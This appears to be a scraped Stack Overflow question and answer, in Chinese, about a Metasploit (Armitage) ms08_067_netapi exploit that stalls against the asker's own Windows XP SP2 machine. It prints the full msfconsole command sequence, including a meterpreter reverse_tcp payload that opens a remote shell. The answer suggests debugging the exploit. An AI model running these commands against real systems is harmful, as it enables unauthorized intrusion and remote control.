gpt4 book ai didi

linux - 回溯 5 Armitage MSF

转载 作者:太空宇宙 更新时间:2023-11-04 11:16:35 26 4
gpt4 key购买 nike

我正在学习从 Armitage 开始的 Metasploit 框架,以大致了解结构等。当我尝试运行漏洞利用程序时,我试图侵入我拥有的旧 Windowx XP sp2

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

我没有收到任何错误,但它停在那里并且没有执行漏洞利用。

最佳答案

所以看起来该漏洞利用不适用于您拥有的 Windows 版本。也许您可以尝试另一种,更简单的方法。这些漏洞是什么时候创建的?您绝对确定它们在您的 Windows 版本中未打补丁吗?

如果你想从运行其他人编写的漏洞利用脚本中学到任何东西,你必须开始调试并尝试理解脚本在做什么。在它说 Attempting to trigger the vulnerability 之后找出脚本到底在做什么,并尝试找出它可能无法工作的原因。这里有太多的可能性可以推测。

关于linux - 回溯 5 Armitage MSF,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/20650402/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com